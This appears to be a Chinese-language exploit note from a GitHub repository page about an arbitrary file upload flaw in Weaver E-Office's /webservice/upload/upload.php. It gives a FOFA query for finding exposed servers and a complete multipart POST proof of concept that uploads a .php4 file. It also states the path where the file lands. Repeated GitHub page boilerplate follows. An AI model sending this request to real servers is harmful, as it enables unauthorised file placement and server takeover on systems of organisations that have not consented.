泛微-eoffice-webservice-file-upload任意文件上传漏洞

泛微/webservice/upload/upload.php接口存在任意文件上传漏洞，导致获取服务器权限。

fofa

app="泛微-EOffice"

poc

POST /webservice/upload/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate, br
Content-Type:multipart/form-data; boundary=--------------------------553898708333958420021355

----------------------------553898708333958420021355
Content-Disposition: form-data; name="file"; filename="qq_test.php4"
Content-Type: application/octet-stream

qqtest
----------------------------553898708333958420021355--

文件路径http://127.0.0.1\attachment\文件名

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

泛微-eoffice-webservice-file-upload任意文件上传漏洞.md

泛微-eoffice-webservice-file-upload任意文件上传漏洞.md

泛微-eoffice-webservice-file-upload任意文件上传漏洞

fofa

poc

Files

泛微-eoffice-webservice-file-upload任意文件上传漏洞.md

Latest commit

History

泛微-eoffice-webservice-file-upload任意文件上传漏洞.md

File metadata and controls

泛微-eoffice-webservice-file-upload任意文件上传漏洞

fofa

poc